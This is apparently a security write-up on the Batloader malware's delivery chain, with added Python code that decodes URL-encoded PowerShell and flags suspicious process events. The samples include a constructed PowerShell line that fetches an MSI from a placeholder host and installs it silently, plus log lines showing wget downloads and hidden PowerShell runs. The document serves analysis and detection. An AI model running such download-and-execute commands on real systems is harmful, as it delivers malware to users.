Batloader (detected by Trend Micro as Trojan.Win32.BATLOADER) is an initial-access malware family known for using malvertising and for embedding script-based malware inside Microsoft Software Installation (MSI) packages downloaded from legitimate-looking but malicious websites.
In this campaign, Batloader abuses powershell.exe and uses obfuscated JavaScript files to evade detection. In our analysis of attacks using this family, we observed it abusing legitimate tools to download and deliver BATLOADER via malicious PowerShell scripts.
The malicious PowerShell script is URL-encoded, which defeats automatic decoding by online decoders and also makes it hard to decode by eye. The encoded string may contain alphanumeric characters and ampersands (&), but the actual decoded file path does not, so the path and file name can still be recovered even though URL encoding is used.
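The recovery step described above, as an added analyst example that is not part of the original article: percent-decoding is applied repeatedly until the string stops changing (which also unwraps double-encoded segments such as `%2543`), and the URL, local path and file name are then pulled out of the decoded command line. The sample command line, the host `example.invalid` and the path `C:\Users\Public\setup.msi` are constructed for this example and are not indicators from the campaign.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample: a PowerShell one-liner whose download URL is
# percent-encoded once and whose drop path is percent-encoded twice.
# Nothing here is a real campaign artifact.
SAMPLE = (
    "powershell.exe -w hidden -c \"$u='%68%74%74%70%73%3a%2f%2f%65%78%61%6d%70%6c%65%2e"
    "%69%6e%76%61%6c%69%64%2f%64%6c%2f%73%65%74%75%70%2e%6d%73%69';"
    "$p='%2543%253a%255c%2555%2573%2565%2572%2573%255c%2550%2575%2562%256c%2569%2563%255c"
    "%2573%2565%2574%2575%2570%252e%256d%2573%2569';"
    "Start-Process msiexec.exe -ArgumentList '/i',$p,'/qn'\""
)

MAX_PASSES = 5  # guard against pathological inputs that never stabilise

URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s'\"<>|]+")


def decode_url_encoded(text, max_passes=MAX_PASSES):
    """Percent-decode until the string stops changing.

    Returns (decoded_text, passes). passes > 1 means at least one segment
    was encoded more than once, which is what trips single-pass decoders.
    """
    current = text
    passes = 0
    while passes < max_passes:
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
        passes += 1
    return current, passes


def extract_artifacts(decoded):
    """Pull URLs, local Windows paths and the file names they point at."""
    urls = URL_RE.findall(decoded)
    paths = WIN_PATH_RE.findall(decoded)
    names = set()
    for url in urls:
        names.add(urlsplit(url).path.rsplit("/", 1)[-1])
    for path in paths:
        names.add(path.rsplit("\\", 1)[-1])
    return urls, paths, sorted(n for n in names if n)


def analyze_script(text):
    """Decode an obfuscated command line and summarise what it references."""
    decoded, passes = decode_url_encoded(text)
    urls, paths, names = extract_artifacts(decoded)
    return {
        "decoded": decoded,
        "passes": passes,
        "double_encoded": passes > 1,
        "urls": urls,
        "paths": paths,
        "file_names": names,
    }


if __name__ == "__main__":
    result = analyze_script(SAMPLE)
    for key in ("passes", "double_encoded", "urls", "paths", "file_names"):
        print(f"{key}: {result[key]}")
```

The loop-until-stable approach is what makes the difference against a web decoder that runs a single pass: the first pass only turns `%2543` into `%43`, and the path becomes readable only on the second.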
At 6:45 AM on March 9th, attackers pushed a malicious Wget.bat script. This batch file used the legitimate Wget.exe tool to download the malicious PowerShell script from GitHub, where the attackers had uploaded it, using the platform as a cloud hosting service. The payload of this script is a BATLOADER installer that downloads and executes two further BATLOADER scripts previously staged by the intruders.
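The delivery chain just described (a batch file launching a legitimate download tool, the fetched script run by PowerShell, then a silent MSI install) is the kind of sequence a process-creation rule can surface. Below is an added detection example, not code from the original article: it runs a few rules over constructed `parent|image|cmdline` log lines and also correlates a download destination with its later execution. The events, hosts, repository names and paths are made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed process-creation events ("parent|image|cmdline"); not real telemetry.
SAMPLE_EVENTS = [
    "explorer.exe|cmd.exe|cmd.exe /c C:\\Users\\alice\\Downloads\\Wget.bat",
    "cmd.exe|wget.exe|wget.exe -q https://raw.githubusercontent.com/example-org/example-repo/main/update.ps1 -O C:\\Users\\Public\\update.ps1",
    "cmd.exe|powershell.exe|powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\update.ps1",
    "powershell.exe|msiexec.exe|msiexec.exe /i C:\\Users\\Public\\setup.msi /qn",
    "explorer.exe|wget.exe|wget.exe https://example.invalid/notes.txt -O C:\\Users\\alice\\Documents\\notes.txt",
    "explorer.exe|powershell.exe|powershell.exe -NoProfile -c Get-Date",
]

DOWNLOAD_TOOLS = {"wget.exe", "curl.exe", "certutil.exe", "bitsadmin.exe"}
# cmd.exe is included so a .bat launched from a user-writable folder is flagged too.
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_EXT = (".ps1", ".bat", ".cmd", ".js", ".vbs", ".msi")

URL_RE = re.compile(r"https?://([^/\s]+)(/[^\s\"']*)?", re.I)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"']+")
USER_WRITABLE_RE = re.compile(r"\\(downloads|appdata|public|temp|programdata)\\", re.I)
SILENT_MSI_RE = re.compile(r"/q[nb]?\b|/quiet", re.I)


@dataclass
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_event(line):
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def is_user_writable(path):
    return bool(USER_WRITABLE_RE.search(path))


def detect(lines):
    """Return (event_index, rule_name, image) findings over the event list."""
    findings = []
    downloaded = set()  # local paths written by a flagged download-tool run
    for i, line in enumerate(lines):
        ev = parse_event(line)
        paths = PATH_RE.findall(ev.cmdline)
        urls = URL_RE.findall(ev.cmdline)  # list of (host, url_path)

        # Rule 1: a download tool fetching a script/installer, or anything from GitHub.
        if ev.image in DOWNLOAD_TOOLS:
            for host, upath in urls:
                if "github" in host.lower() or (upath or "").lower().endswith(SCRIPT_EXT):
                    findings.append((i, "download_tool_fetches_script", ev.image))
                    downloaded.update(p.lower() for p in paths)
                    break

        # Rule 2: a script host running a script that lives in a user-writable folder.
        if ev.image in SCRIPT_HOSTS:
            for p in paths:
                if p.lower().endswith(SCRIPT_EXT) and is_user_writable(p):
                    findings.append((i, "script_host_runs_user_writable_script", ev.image))
                    break

        # Rule 3: a silent MSI install from a user-writable folder.
        if ev.image == "msiexec.exe" and SILENT_MSI_RE.search(ev.cmdline):
            if any(is_user_writable(p) for p in paths):
                findings.append((i, "silent_msi_install_from_user_dir", ev.image))

        # Rule 4 (correlation): a file written by Rule 1 is later executed.
        if ev.image not in DOWNLOAD_TOOLS:
            for p in paths:
                if p.lower() in downloaded:
                    findings.append((i, "downloaded_file_executed", ev.image))
                    break
    return findings


if __name__ == "__main__":
    for idx, rule, image in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} ({image})")
```

Rules 1 to 3 each fire on a single event; Rule 4 is the one that ties the wget.exe download to the later PowerShell execution of the same file, which is the relationship an analyst would otherwise have to reconstruct by hand. The benign events (a text file fetched by wget and an interactive `Get-Date`) produce no findings.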